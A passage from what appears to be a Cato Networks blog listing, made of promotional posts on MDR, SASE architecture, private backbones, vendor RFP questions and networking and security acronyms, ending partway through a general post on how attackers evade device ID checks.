requires expertise with these tools. MDR eliminates the need for enterprises to maintain these skills in-house. Security Alert Overload: The average enterprise’s security operations center (SOC) receives over 10,000 security alerts per day, which can easily overwhelm a security team. MDR only notifies the enterprise of threats that require their attention. Advanced Threat Prevention and Preparation: Preventing, detecting, and remediating attacks by threat actors requires specialized knowledge and expertise. The MDR service includes incident prevention, detection, and response. MDR by Cato Cato offers MDR services to its Cato SASE Cloud customers. Some of the key features of Cato MDR include: Zero-Footprint Data Collection: Cato’s MDR and Zero-Day threat prevention services are built on Cato Cloud, its cloud-native SASE network. With network visibility and security built into the network infrastructure itself, there is no need for additional installations. Automated Threat Hunting: Cato performs automated threat hunting, leveraging big data and machine learning to identify anomalous and suspicious traffic across its platform. Cato’s rich dataset and wide visibility enable it to rapidly and accurately identify potential threats. Human Verification: The results of Cato’s automated analysis are verified by human security analysts. This prevents action from being taken based on false positive detections. Network Level Threat Containment: Cato controls the infrastructure that all network traffic flows over and has application-layer visibility into traffic. This enables Cato to isolate infected systems at the network level. Guided Remediation: Cato provides guidance to help enterprises through the process of remediating a cybersecurity incident. This helps to ensure that the threat has been eliminated before quarantine is lifted and normal operations are restored. Cato’s MDR has immediate ‘time to value’ because it can roll out immediately with no additional solution deployment required. To learn more about Cato SASE Cloud and Cato MDR service, contact us. In our next post, MDR: The Benefits of Managed Detection and Response, we take a look at a number of key benefits that enterprises can expect when partnering with an MDR provider.

The Branch of One: Designing Your Network for the WFH Era

For decades, the campus, branch, office, and store formed the business center of the organization. Working from anywhere is challenging that paradigm. Is the home becoming a branch of one, and what does the future hold for the traditional branch, the work home for the many? Network architects are used to building networking and security...
The Branch of One: Designing Your Network for the WFH Era For decades, the campus, branch, office, and store formed the business center of the organization. Working from anywhere is challenging that paradigm. Is the home becoming a branch of one, and what does the future hold for the traditional branch, the work home for the many? Network architects are used to building networking and security capabilities into and around physical locations: branches and datacenters. This location-centric design comes at a significant cost and complexity. It requires premium connectivity options such as MPLS, high availability and traffic shaping (QoS) through SD-WAN appliances, and securing Internet traffic with datacenter backhauling, edge firewalls, and security as a service. However, network dynamics have changed with the emergence of cloud computing, public cloud applications, and the mobile workforce. Users and applications migrated away from corporate locations, making infrastructure investments in these locations less applicable, thus requiring new designs and new capabilities. The recent pandemic accelerated migration, creating a hybrid work model that required a fluid transition between the home and the office based on public health constraints. [boxlink link="https://www.catonetworks.com/superpowered-sase/?utm_source=blog&utm_medium=top_cta&utm_campaign=super_power_sase"] Check out our SUPER POWERED SASE | On Demand Webinars [/boxlink] In their research paper, “2021 Roadmap for SASE Convergence,” Gartner analysts Neil Macdonald, Nat Smith, Lawrence Orans, and Joe Skorupa highlight the paradigm shift from an IT architecture focused on the place of work to one that focuses on the person doing the work and the work that needs to be done. In the simplest terms, Gartner views the user as a branch of one, and the branch as merely a collection of users. But, catchy phrases aside, how do you make this transition from a branch-centric to a user-centric architecture? This is where SASE comes in. It is the SASE architecture that enables this transition, as it is built upon four core principles: convergence, cloud-native, globally distributed, and support for all edges. Let’s examine how they enable the migration from branch-centric to user-centric design: Convergence: To deliver secure and optimized access to users, we need a wide range of networking and security capabilities available to support them including routing, traffic shaping, resilient connectivity, strong access controls, threat prevention, and data protection. Traditionally these were delivered via multiple products that were difficult to deploy and maintain. Convergence reduces the number of moving parts to, ideally, a single tight package the processes all end-user traffic, regardless of location, according to corporate policies and across all the required capabilities Cloud-native: A converged solution can be architected to operate in multiple places. It can reside in the branch or the datacenter, and it can live inside a cloud service. Being cloud-native, that is “built as a cloud service,” places the converged set of capabilities in the middle of all traffic regardless of source or destination. This isn’t true for edge appliances that deliver converged capabilities at a given physical location. While this is a workable solution, it cements the location-centric design pitfalls that requires traffic to specifically reach a certain location, adding unnecessary latency, instead of delivering the required capabilities as close as possible to the location of the user. Global: A cloud-native architecture is easier to distribute globally to achieve resiliency and scalability. It places the converged set of capabilities near users (in and out of the office). Cloud service density, that is the number of Points of Presence (PoPs) comprising the service, determines the latency users will experience accessing their applications. Using a global cloud-service built on PoPs has extensible reach that can address emerging business requirement such as geographical expansion and M&A. The alternative is much more costly and complex and involve setting up new co-locations, standardizing the networking and security stack, and figuring out global connectivity options. All this work is unnecessary when a SASE cloud service provider. All edges: By taking a cloud-first approach and allowing locations, users, clouds, and application to “plug” into the cloud service, optimal and secure access service can be delivered to all users regardless of where they work from, and to any application, regardless of where it is deployed. An architecture that supports all edges, is driven by identity, and enforces that same policy on all traffic associated with specific users or groups. This is a significant departure from the 5-tupple network design, and it is needed to abstract the user from the location of work to support a hybrid work model. Gartner couldn’t have predicted COVID-19, but the SASE architecture it outlined enables the agility and resiliency that are essential for businesses today. Yes, it involves a re-architecture of how we do networking and security and requires that we rethink many old axioms and even the way we build and organize our networking and security teams. The payback, however, is an infrastructure platform that can truly support the digital business, and whatever comes next.    

The Benefits of Managed Detection and Response (MDR)

Before diving into the benefits of partnering with an MDR provider, we recommend reading our previous post, MDR: Understanding Managed Detection and Response. What is MDR? In a nutshell, MDR provides ongoing threat detection and response for network security threats using machine learning to investigate, alert, and contain security threats at scale. The “managed” in...
The Benefits of Managed Detection and Response (MDR) Before diving into the benefits of partnering with an MDR provider, we recommend reading our previous post, MDR: Understanding Managed Detection and Response. What is MDR? In a nutshell, MDR provides ongoing threat detection and response for network security threats using machine learning to investigate, alert, and contain security threats at scale. The “managed” in MDR refers to the fact that these automated solutions are complemented by human operators who validate alerts and support proactive activities such as threat hunting and vulnerability management. According to Gartner, half of companies will partner with an MDR provider by 2025. This rapid adoption is driven by several factors, including the expanding cybersecurity skills gap and the emergence of technologies like secure access service edge (SASE) and zero trust network access (ZTNA) that enable MDR providers to more effectively and scalably offer their services. [boxlink link="https://go.catonetworks.com/Eliminate-Threat-Intelligence-False-Positives-with-SASE.html?utm_source=blog&utm_medium=top_cta&utm_campaign=threat_elements"] Eliminate Threat Intelligence False Positives | eBook [/boxlink] Managed Detection and Response Benefits MDR providers act as a full-service outsourced SOC for their customers, and partnering with an MDR provider carries a number of benefits: 24/7 Monitoring: MDR providers offer round-the-clock monitoring and protection for client networks. Since cyberattacks can happen at any time, this constant protection is essential for rapid response to threats. Proactive Approach: MDR offers proactive security, such as threat hunting and vulnerability assessments. By identifying and closing security holes before they are exploited by an attacker, MDR helps to reduce cyber risk and the likelihood of a successful cybersecurity incident. Better Intelligence: MDR providers have both broad and deep visibility into client networks. This enables them to develop and use threat intelligence based on both wide industry trends and enterprise-specific threats during incident detection and response. Experienced Analysts: MDR helps to close the cybersecurity skills gap by providing customers with access to skilled cybersecurity professionals. This both helps to meet headcount and ensures that customers have access to specialized skill sets when they need them. Vulnerability Management: Vulnerability management can be complex and time-consuming, and many companies rapidly fall behind. MDR providers can help to identify vulnerable systems, perform virtual patching, and support the installation of required updates. Improved Compliance: MDR providers often have expertise in regulatory compliance, and their solutions are designed to meet the requirements of applicable laws and regulations. Additionally, the deep visibility of an MDR provider can simplify and streamline compliance reporting and audits. Managed Detection and Response Tools When offered as part of a SASE solution, MDR delivers the following key benefits: Zero-Footprint Data Collection: With MDR and zero-day threat prevention services built into the SASE Cloud, additional security solutions are unnecessary. Automated Threat Hunting: When MDR monitors for suspicious network flows using ML/AI, this allows rapid, scalable detection of potential cyber threats, decreasing the time that an intrusion goes undetected (“dwell time”). Human Verification: All automatically-generated security alerts are reviewed and validated by the SASE vendor’s SOC team. This eliminates false positives and ensures that true threats receive the attention that they deserve. Network Level Threat Containment: The SASE vendor’s control over the underlying network infrastructure enables it to quarantine infected computers. This prevents threats from spreading while remediation is occurring. Guided Remediation: MDR built into SASE provides contextual data and remediation recommendations for identified threats to the SASE’s vendor security team. Adopting MDR for your Organization Cato’s MDR has immediate ‘time to value’ for its Cato SASE Cloud customers because security is built into its network infrastructure and security services can be rolled out immediately. This allows companies to rapidly achieve the security maturity needed to achieve regulatory compliance and protect themselves against cyber threats. To learn more about Cato’s MDR services contact us and request a free demo.    

26 Cybersecurity Acronyms and Abbreviations You Should Get to Know

We’ve all heard of AV and VPN, but there are many more cybersecurity-related acronyms and abbreviations that are worth taking note of. We gathered a list of the key acronyms to help you keep up with the constantly evolving cybersecurity landscape. SASE Secure Access Service Edge (SASE) is a cloud-based solution that converges network and...
26 Cybersecurity Acronyms and Abbreviations You Should Get to Know We’ve all heard of AV and VPN, but there are many more cybersecurity-related acronyms and abbreviations that are worth taking note of. We gathered a list of the key acronyms to help you keep up with the constantly evolving cybersecurity landscape. SASE Secure Access Service Edge (SASE) is a cloud-based solution that converges network and security functionalities. SASE’s built-in SD-WAN functionality offers network optimization, while the integrated security stack – including Next Generation Firewall (NGFW), Secure Web Gateway (SWG), Zero Trust Network Access (ZTNA), and more – secures traffic over the corporate WAN. According to Gartner (that coined the term), SASE is “the future of network security.” [boxlink link="https://www.catonetworks.com/cybersecurity-masterclass/?utm_source=blog&utm_medium=top_cta&utm_campaign=masterclass_lobbypage"] Cybersecurity Master Class | Check it out [/boxlink] CASB Cloud Access Security Broker (CASB) sits between cloud applications and users. It monitors all interactions with cloud-based applications and enforces corporate security policies. As cloud adoption grows, CASB (which is natively integrated into SASE solutions) becomes an essential component of a corporate security policy. ZTNA Zero Trust Network Access (ZTNA), also called a software-defined perimeter (SDP), is an alternative to Virtual Private Network (VPN) for secure remote access. Unlike VPN, ZTNA provides access to corporate resources on a case-by-case basis in compliance with zero trust security policies. ZTNA can be deployed as part of a SASE solution to support the remote workforce of the modern distributed enterprise. SDP Software-Defined Perimeter (SDP) is another name for ZTNA. It is a secure remote access solution that enforces zero trust principles, unlike legacy remote access solutions. ZTE Zero Trust Edge (ZTE) is Forrester’s version of SASE and uses ZTNA to provide a more secure Internet on-ramp for remote sites and workers. A ZTE model is best implemented with SASE, which distributes security functionality at the network edge and enforce zero trust principles across the corporate WAN. DPI Deep Packet Inspection (DPI) involves looking at the contents of network packets rather than just their headers. This capability is essential to detecting cyberattacks that occur at the application layer. SASE solutions use DPI to support its integrated security functions. NGFW Next-Generation Firewall (NGFW) uses deep packet inspection to perform Layer 7 application traffic analysis and intrusion detection. NGFW also has the ability to consume threat intelligence to make informed threat decisions and may include other advanced features beyond those of the port/protocol inspection of the traditional firewall. FWaaS Firewall as a Service (FWaaS) delivers the capabilities of NGFW as a cloud-based service. FWaaS is one of the foundational security capabilities of a SASE solution. IPS Intrusion Prevention System (IPS) is designed to detect and block attempted attacks against a network or system. In addition to generating alerts, like an intrusion detection system (IDS) would, an IPS can update firewall rules or take other actions to block malicious traffic. SWG Secure Web Gateway (SWG) is designed to protect against Internet-borne threats such as phishing or malware and enforce corporate policies for Internet surfing. SWG is a built-in capability of a SASE solution, providing secure browsing to all enterprise employees. NG-AM Next Generation Anti-Malware (NG-AM) uses advanced techniques, such as machine learning and anomaly detection to identify potential malware. This allows detecting modern malware, which is designed to evade traditional, signature-based detection schemes. UTM Unified Threat Management (UTM) is a term for security solutions that provide a number of different network security functions. SASE delivers all network security needs from a cloud service, eliminating the hassle of dealing with appliance life-cycle management of UTM. DLP Data Loss Prevention (DLP) solutions are designed to identify and respond to attempted data exfiltration, whether intentional or accidental. The deep network visibility of SASE enables providing DLP capabilities across the entire corporate WAN. WAF Web Application Firewall (WAF) monitors and filters traffic to web applications to block attempted exploitation or abuse of web applications. SASE includes WAF functionality to protect web applications both in on-premises data centers and cloud deployments. SIEM Security Information and Event Management (SIEM) collects, aggregates, and analyzes data from security appliances to provide contextual data and alerts to security teams. This functionality is necessary for legacy security deployments relying on an array of standalone solutions rather than a converged network security infrastructure (i.e. SASE). SOC Security Operations Center (SOC) is responsible for protecting enterprises against cyberattacks. Security analysts investigate alerts to determine if they are real incidents, and, if so, perform incident response and remediation. MDR Managed Detection and Response (MDR) is a managed security service model that provides ongoing threat detection and response by using AI and machine learning to investigate, alert, and contain threats. When MDR is incorporated into a SASE solution, SOC teams have immediate, full visibility into all traffic, eliminating the need for additional network probes or software agents. TLS Transport Layer Security (TLS) is a network protocol that wraps traffic in a layer of encryption and provides authentication of the server to the client. TLS is the difference between HTTP and HTTPS for web browsing. SSL Secure Sockets Layer (SSL) is a predecessor to TLS. Often, the protocol is referred to as SSL/TLS. TI Threat Intelligence (TI) is information designed to help with detecting and preventing cyberattacks. TI can include malware signatures, known-bad IP addresses and domain names, and information about current cyberattack campaigns. CVE Common Vulnerabilities and Exposure (CVE) is a list of publicly disclosed computer security flaws. . Authorities like MITRE will assign a CVE to a newly-discovered vulnerability to make it easier to track and collate information about vulnerabilities across multiple sources that might otherwise name and describe it in different ways. APT Advanced Persistent Threat (APT) is a sophisticated cyber threat actor typically funded by nation-states or organized crime. These actors get their name from the fact that they have the resources and capabilities required to pose a sustained threat to enterprise cybersecurity. DDoS Distributed Denial of Service (DDoS) attacks involve multiple compromised systems sending spam requests to a target service. The objective of these attacks is to overwhelm the target system, leaving it unable to respond to legitimate user requests. XDR Extended Detection and Response (XDR) is a cloud-based solution that integrates multiple different security functions to provide more comprehensive and cohesive protection against cyber threats. It delivers proactive protection against attacks by identifying and blocking advanced and stealthy cyberattacks. SSE Security Service Edge (SSE) moves security functionality from the network perimeter to the network edge. This is the underlying principle behind SASE solutions. IoC Indicators of Compromise (IoC) is data that can be used to determine if a system has been compromised by a cyberattack such as malware signatures or known-based IP addresses or domains. IOCs are commonly distributed as part of a threat intelligence feed.    

Does Your Backbone Have Your Back?

Private backbone services are all the rage these days. Google’s recent announcement of the GCP Network Connectivity Center (NCC) joins other similar services such as Amazon’s AWS Transit Gateway and Microsoft’s Azure Virtual WAN. Private backbones enable high quality connections that don’t rely on the public Internet. There are no performance guarantees in the public...
Does Your Backbone Have Your Back? Private backbone services are all the rage these days. Google’s recent announcement of the GCP Network Connectivity Center (NCC) joins other similar services such as Amazon’s AWS Transit Gateway and Microsoft’s Azure Virtual WAN. Private backbones enable high quality connections that don't rely on the public Internet. There are no performance guarantees in the public internet which means connections often suffer from high latency, jitter and packet loss. The greater the connection’s distance, the greater the performance degradation we will typically experience. A private backbone overcomes this and ensures traffic runs fast and smooth between any two locations within the provider’s network. So, should you use a private backbone? Absolutely. Why travel single-lane, congested and traffic-light ridden roads when you can take a multi-lane, obstacle free highway? This is a no-brainer. And with all major public cloud providers now offering private backbones, there’s got to be one that’s right for you, right? Let's take a deeper look at an enterprise’s connectivity needs and what private backbones have to offer. [boxlink link="https://www.catonetworks.com/resources/sase-vs-sd-wan-whats-beyond-security?utm_source=blog&utm_medium=top_cta&utm_campaign=SASE_vs_SD-WAN"] SASE vs SD-WAN - What’s Beyond Security | Download eBook [/boxlink] What are we trying to solve? Enterprises have been relying on MPLS circuits to ensure connection quality between their offices and datacenters. Looking beyond the obvious drawbacks of MPLS, namely high cost and operational rigidity for applications which have been migrated to the cloud, MPLS lines provide little to no value. Enterprises must therefore find an alternative way to optimize traffic to cloud datacenters. This is where private backbones prove their value and enable highway-like connectivity to cloud deployments. But just like any other highway, the benefit they provide depends on how close they run to where you are travelling from and where you need to get to. Since public cloud providers deploy private lines between their datacenter locations, they will benefit enterprise endpoints which are themselves located near them. Let's break this down into a couple of questions which can help us better understand what it means. Where are you coming from? The point of origin for enterprise connectivity is anywhere employees connect from. This used to be the office for the most part but has increasingly shifted to employees' homes. This means the dispersion of connecting endpoints has significantly grown and requires a highway system which has much greater and more granular coverage in order to be effective. In the world of private backbones this translates into PoP coverage. The more locations the network has PoPs at, the closer it will likely reach your origin points. AWS Transit Gateway has 16 PoPs1, Azure virtual WAN has 392 and GCP NCC has 103. Are all your users connecting from locations close to these PoPs? There's a good chance you need a private backbone with better coverage. Where are you headed? One of the main reasons to use a private backbone is to enable high quality connectivity to public cloud datacenters. As mentioned above, public cloud offerings provide connectivity to these locations exactly, which makes them seem like an obvious choice. An important point to keep in mind, though, is that since private backbone services don't interconnect, you can only use one. Most enterprises, however, don't use just one public cloud. In fact, out of all enterprises using public services, 92 percent have a multi-cloud strategy4 with an average of 2.64 public cloud services each. Choosing a public cloud's private backbone offerings will be a good fit for that specific cloud's datacenter locations, but what about the other 1.6 public clouds the typical enterprise needs to reach? Who is going to guarantee connectivity performance to their datacenters? It is certainly not in the interest of AWS to guarantee your network's performance when accessing Azure, GCP or any other cloud provider. If anything, their interest is exactly the opposite. They want to lock you into their own service. Only a cloud-agnostic private backbone service will have an interest and the ability to guarantee connectivity performance to all public cloud datacenters. It will also reduce your dependency and risk of lock-in to any single public cloud vendor. They may serve, but do they protect? Network performance plays an important part in ensuring enterprise applications are delivered smoothly, but we must also ensure the enterprise network is protected. This is where security services such a Next Generation Firewalls (NGFW), Intrusion Prevention Systems (IPS), Next Generation Anti-Malware (NGAM), Secure Web Gateway (SWG), Software Defined Perimeter (SDP)/Zero Trust Network Access (ZTNA) for remote user connectivity, and others come into play. The question is where do they fit in the traffic flow? One option is to deploy them at the enterprise endpoint locations, which means traffic will first pass through them before entering, or after exiting, the private backbone. However, deploying all the above security solutions at each and every endpoint location can become quite expensive, not to mention complex to manage. Deploying them at a subset of locations (for example only at datacenters) means branch office and remote user traffic bound for a cloud-based service will need to backhaul through these locations (Fig.1). This adds latency and misses the point of having a private backbone connection for direct access to the cloud. [caption id="attachment_18668" align="alignnone" width="624"] Figure 1. Security deployed at endpoint[/caption] A second option is to use a cloud-based security service (Fig. 2). This means adding a hop along the way in order to pass through where the service is delivered from. So instead of using the private backbone for a single, direct end-to-end connection, we need to break the journey into two separate legs, user to cloud security service and cloud security service to enterprise service. This, again, defeats the purpose of having a private backbone. [caption id="attachment_18988" align="alignnone" width="588"] Figure 2. Security delivered from a cloud service[/caption]  A third option is to use a private backbone which has all the security services deployed at each of its PoPs. This means that wherever you connect from, your traffic will be protected by a full security stack at the PoP nearest to you. From there, the private backbone will carry your traffic directly to its destination, wherever it may be. This will enable full security for all endpoints with no backhauling or additional stops along the way. The question is where do you find a solution that converges a private backbone with a full security stack in a single service? Gartner have defined such an architecture and named it the Secure Service Access Edge (SASE). SASE: Private backbone done right Cato is the world's first SASE platform which converges networking, security, remote access, and a global private backbone into a unified cloud-native service. All PoPs run Cato's full security stack and provide complete protection to all endpoint traffic (Fig. 3). [caption id="attachment_18719" align="alignnone" width="575"] Figure 3. Security embedded into backbone PoPs[/caption]   This architecture, in which the security services are embedded within each network node, enables enterprises to harness the full performance potential of their global private backbone. There is no need to backhaul or add hops on the way to the service destination. Additionally, Cato's SASE Cloud is comprised of more than 65 PoPs, providing superior global coverage from anywhere your users connect from. Why Choose Cato's SASE Cloud? Cato’s SASE Cloud has superior global distribution for optimal backbone performance. It has a full security stack embedded into every PoP, which eliminates the need for backhauling or adding hops to your traffic flows. Cato’s SASE Cloud is a truly converged solution which simplifies your network topology and offers single-pane-of-glass management for backbone, security, networking, and remote access in a unified console. It is also IaaS vendor agnostic, ensuring your applications' performance when delivered from any public cloud platform, and helps you avoid vendor lock-in. Cato SASE Cloud. The backbone that serves and protects.   Figure 1  Figure 2  Figure 3 Figure 4    

Navigating Your First Steps with a Potential SASE Vendor

When deciding to digitally transform your network to SASE, the large number of vendors out there might be confusing. What’s the best approach to take when comparing the different service providers? This blog post will provide you a methodical way to manage the conversations with any potential vendor, so you can ensure their solution can...
Navigating Your First Steps with a Potential SASE Vendor When deciding to digitally transform your network to SASE, the large number of vendors out there might be confusing. What’s the best approach to take when comparing the different service providers? This blog post will provide you a methodical way to manage the conversations with any potential vendor, so you can ensure their solution can answer your needs. To get the full SASE RFP template to help you navigate the vendor vetting process, click here. But first, let’s understand what SASE is. What is SASE? SASE (Secure Access Service Edge) is an innovative network and security architecture that is being increasingly adopted by global organizations. As a unified, global and cloud-based network that supports all edges, SASE improves network performance, reduces the attack surface and minimizes IT overhead. [boxlink link="https://www.catonetworks.com/resources/sase-rfi-rfp-template/?utm_source=blog&utm_medium=top_cta&utm_campaign=sase_rfi"] SASE RFI Made Easy | Get the Template [/boxlink] What is SASE? SASE (Secure Access Service Edge) is an innovative network and security architecture that is being increasingly adopted by global organizations. As a unified, global and cloud-based network that supports all edges, SASE improves network performance, reduces the attack surface and minimizes IT overhead. What to Discuss with Potential SASE Vendors We recommend discussing four main categories with your vendor as part of your RFI process: Your business and IT The vendor’s architecture The vendor’s capabilities The vendor’s service and support Let’s dive into each one and see which aspects should be covered. 1. Your Business and IT The purpose of this first discussion area is to help vendors to understand your business goals and your existing architecture. This will enable them to customize their solution to your needs and explain the value it can provide you. Discussion points should include: Your business - provide an overview of your business, as well as the SASE project’s business goals in your eyes. IT architecture - describe your topology and stack, including your network architecture, technologies, topologies, geographies and security capabilities. Include any existing IT projects you are running or plan to incorporate in the future. Use cases - explain your current and planned use cases. Include geographies, mobile users, branches, cloud migration plans, and more. Pro tip: provide the vendor with information about your future business goals that are seemingly unrelated to the project. You might be surprised at how SASE can help you achieve them. 2. SASE Architecture The following section of the SASE RFI template will enable you to validate that the vendor’s SASE architecture meets business network needs. For example, SD-WAN, global reach, where elements are placed, and more. Discussion points include: Architecture components - understand how the vendor provides SD-WAN, secure branch access, cloud optimization, global connectivity and mobile access. Architecture capabilities - ensure the architecture can support and provide high availability, stability, scalability, high performance, and simplified management. Architecture diagram - ask to see a diagram of the vendor’s architecture. Pro tip: Ask the vendor to explain how the different components and capabilities contribute to the success of the project and your business goals. 3. SASE Capabilities This third section in the SASE RFP template includes all the capabilities that will improve your network and security capabilities. You can pick and choose which capabilities you need now, but make sure your SASE vendor can expand to any additional needs you will need in the future. Capabilities to discuss: SD-WAN - discuss link management capabilities, traffic routing and QoS, managing voice and latency-sensitive traffic, supported throughputs and edge devices, monitoring and reporting capabilities, how site provisioning works, and roll out strategies. Security - understand how traffic is encrypted, which threat prevention and threat detection capabilities are available, how branch and cloud security are implemented, how mobile users are secured, which identity and users awareness systems are incorporated, how policies are managed and enforced and which analytics and reporting capabilities are provided. Cloud - Which components are provided, which integrations are included and how traffic is optimized. Mobile - How mobile users are connected to the network while optimizing and securing traffic, and if ZTNA is provided. Global Connectivity - How traffic is optimized and latency is reduced from site to site and across the internet. Pro tip: Ask the vendor to weigh in on which capabilities can answer your business goals. 4. SASE Support and Services This fourth and final section of the SASE RFP template is about the relationship between you and the vendor after implementing SASE. It includes the co-management and maintenance of the project, what happens if things go wrong and how you can make changes after roll out. Discussion points include: Support and professional services - When and how support is provided, what the SLAs are and which professional services are available. Managed services - which services are provided, what the different packages are, co-management capabilities, what is available through self-service and outsourcing options. Pro tip: Ask to speak with existing customers who’ve used support services to find out how the vendor deals with issues. Next Steps for Finding a SASE Vendor SASE provides IT managers and network and security teams with a converged, simplified solution that replaces all existing point solutions. However, it’s important to choose the right vendor. A good SASE vendor will answer all of an organization's existing and future needs. Take your time to discuss all the points from above with the vendor, until you’re confident that your employees’ needs will be answered and the business can continue to grow without network and security frictions. The discussion points in this blog post are based on a more comprehensive RFP template prepared by Cato Networks. You can get the full template free of charge here.    

23 Good-To-Know Networking Acronyms and Abbreviations

You probably know what WAN stands for, but what about all of the other acronyms and abbreviations in the networking world? Here’s a list of the key acronyms to help you keep up with the latest in WAN transformation. SASE Secure Access Service Edge (SASE) converges network and security functionalities into a single cloud-based solution....
23 Good-To-Know Networking Acronyms and Abbreviations You probably know what WAN stands for, but what about all of the other acronyms and abbreviations in the networking world? Here’s a list of the key acronyms to help you keep up with the latest in WAN transformation. SASE Secure Access Service Edge (SASE) converges network and security functionalities into a single cloud-based solution. SASE merges the network optimization capabilities of SD-WAN with a full security stack, including Next Generation Firewall (NGFW), Secure Web Gateway (SWG), Zero Trust Network Access (ZTNA), and more. According to Gartner that coined the term, SASE is “the future of network security.” SD-WAN Software-Defined Wide Area Network (SD-WAN) is a virtual WAN architecture offering optimized traffic routing over multiple different media (broadband, MPLS, 5G/LTE, etc.). By choosing the best available path, SD-WAN provides better performance and reliability than broadband Internet. Keep in mind however, that unless SD-WAN is deployed as part of SASE, it can’t support global connectivity, network optimization, WAN and Internet security, cloud acceleration, and remote users. MPLS Multiprotocol Label Switching (MPLS) routes traffic over telecommunications networks using short path labels instead of longer network addresses. MPLS improves the performance and reliability of traffic flows, yet remains an expensive, rigid solution with limited capacity. [boxlink link="https://www.catonetworks.com/resources/the-top-seven-use-cases-for-sase?utm_source=blog&utm_medium=top_cta&utm_campaign=7_sase_usecase"] Top 7 Use Cases for SASE | Download eBook [/boxlink] PoP A Point of Presence (PoP) is an access point to a network, such as a SASE or SD-WAN appliance. Traffic can enter and exit these networks via a PoP. According to Gartner, many emerging edge applications require “a cloud-delivery-based approach, favoring providers with many points of presence (POPs).” Source: Market Trends: How to Win as WAN Edge and Security Converge Into the Secure Access Service Edge, 29 July 2019, Joe Skorupa, Neil MacDonald VPN Virtual Private Network (VPN) solutions provide an encrypted link between a network and a remote user or network. Traffic sent over the VPN acts as if the remote device is directly connected to the network with full access to corporate resources. Enterprises that have traditionally relied on VPN are realizing that it’s poorly suited for the shift to the cloud and work-from-anywhere reality, as it lacks granular security, global scalability and performance optimization capabilities. UC Unified Communications (UC) is the integration of corporate communications services, such as voice, messaging, videoconferencing, etc. UC creates a consistent user interface and experience across multiple communications media but requires a high-performance, reliable, and geographically distributed network. UCaaS Unified Communications as a Service (UCaaS) is a cloud-based delivery model for UC. With SASE, UCaaS traffic is optimally routed to the UCaaS provider instance, and UC/UCaaS components connected to a SASE Cloud are protected against network attacks without requiring additional security solutions. QoE Quality of Experience (QoE) measures how network performance impacts the end user. QoE takes into account the fact that some performance issues may have a negligible impact on application performance while others render an application unusable. For example, SASE provides a higher QoE than VPN for cloud-based applications by eliminating the need to backhaul traffic through the enterprise network. PbR Policy-based Routing (PbR) routes network flows based on policies defined by a network administrator. It can provide priority to certain types of traffic or allow it to use more expensive routes, such as MPLS circuits. SD-WAN and SASE solutions offer PbR functionality. 5G 5th generation mobile networks are the most recent generation of cellular networks. They offer higher speeds and support higher densities of devices than previous generations. SD-WAN and SASE solutions often connect to 5G networks to provide increased resiliency. AIOps Artificial intelligence for IT operations (AIOps) uses machine learning and big data to improve IT operations. AIOps enables automated data processing, decision-making, and response for IT operations. A SASE architecture enables businesses to realize the full potential of AIOps, allowing IT to focus on valuable business objectives such as user experience, revenue, and growth. VoIP Voice over IP (VoIP) enables voice communications over broadband Internet. Telephony data is encoded in network packets and sent over the Internet to its destination rather than traditional phone networks. Like UC solutions, VoIP requires high-performance, reliable, and geographically distributed networks. CDN Content Delivery Network (CDN) is a geographically distributed network of servers that serve cached copies of web content. CDNs improve a website’s performance by moving the service closer to end users and decreasing the load on the origin server. NaaS Network as a Service (NaaS) is a delivery model for cloud-based networking services. With NaaS, a company can deploy and manage its own networks using infrastructure maintained by its service provider. SASE is an example of a NaaS offering because SASE PoPs provide all required network services in a cloud-based appliance. ISP Internet Service Providers (ISP) provide their customers with access to the Internet. In addition to Internet access, ISPs may also offer other services, such as email, web hosting, and domain registration. uCPE Universal Customer Premises Equipment (uCPE) is a general-purpose off-the-shelf server, including compute, storage, and networking. uCPEs provide network and security services using network function virtualization. NFV Network Function Virtualization (NFV) provides network functions using virtualized services rather than dedicated appliances. This enables these functions to be provided using uCPEs or cloud platforms rather than expensive, dedicated infrastructure. VNF Virtual Network Functions (VNF) are virtualized network services that replace dedicated hardware appliances. VNFs can be linked together using service chaining to create more complex functionality. The use of VNFs and service chaining is common among providers of SASE alternatives that lack the required service convergence of SASE. SDN Software-Defined Networks (SDN) decouple the control plane from the forwarding plane. The network is defined and managed in software, making it more flexible and adaptable. SD-WAN and SASE are examples of SDN applied to the corporate WAN. LAN Local Area Networks (LAN) link computers together within an organization. A LAN is connected to the Internet via one or more ISPs. BGP The Border Gateway Protocol (BGP) is a protocol for exchanging routing information between different autonomous systems (ASes) on the Internet. Each AS advertises which IP addresses it can route traffic to, helping traffic move from its source AS to the AS closest to its destination. OSPF The Open Shortest Path First (OSPF) protocol is designed to route traffic within an AS. It uses Dijkstra’s algorithm to find the shortest route to its destination, minimizing the distance that the traffic needs to travel and hopefully the latency as well. DNS The Domain Name Service (DNS ) is the “address book” of the Internet. DNS servers translate domain names (like catonetworks.com) to the IP addresses used by computers to route traffic. While these are some of the most common and important acronyms in networking, this is far from a complete list. To learn more about how modern networks work, read more on the Cato Networks blog.    

Attackers are Zeroing in On Trust with New Device ID Twist

The cat-and-mouse game between threat actors and security researchers is ever-evolving. With every new threat comes a security solution that in turn triggers the threat’s evolution. It’s an ongoing process whose most recent twist in the Device ID game was documented in our just-released SASE report on enterprise security. Device ID’s Led to Spoofing-as-a-Service Device...
Attackers are Zeroing in On Trust with New Device ID Twist The cat-and-mouse game between threat actors and security researchers is ever-evolving. With every new threat comes a security solution that in turn triggers the threat’s evolution. It’s an ongoing process whose most recent twist in the Device ID game was documented in our just-released SASE report on enterprise security. Device ID’s Led to Spoofing-as-a-Service Device ID is an authentication measure that identifies attackers using compromised credentials by inspecting the device used and comparing it to previous devices used by this account. Most Device ID solutions use a weighted average formula to determine if the incoming device is risky. For example, hardware and screen resolution rarely change, so they get a significant “weight” in the overall calculation. At the same time, a browser version may receive lower priority as it gets patched and changed more often. Threat actors have used a variety of tools and techniques over the years to fool Device ID solutions. One of the first tools was software that would allow the attacker to spoof several of the many hardware and software components installed on their system (for example – changing the hardware versions). Other early techniques included using an iPhone’s browser to perform a login. All iPhones have the same hardware, and the iOS also tends to be consistent thanks to Apple alerting users to an out-of-date operating system. In other words – the lack of entropy served the attackers well. One of the latest iterations of Device ID evasion comes in the form of Spoofing-as-a-Service – online dark web services where threat actors send service providers details of the device they are trying to spoof. The service provider creates a VM (Virtual Machine) that would pass a device ID check and can be accessed over the Web. These services come at a significant price jump compared to “on-prem” solutions but provide an extra layer of security for the attacker. The Latest Twist to Device ID One question remains – how does the threat actor collect all the system data needed for spoofing? Be it spoofing as a service or a local tool, the attacker must know the victim’s device’s details to spoof them. One of the principles of zero trust architectures is continuous and contextual authentication in which Device ID plays a role. 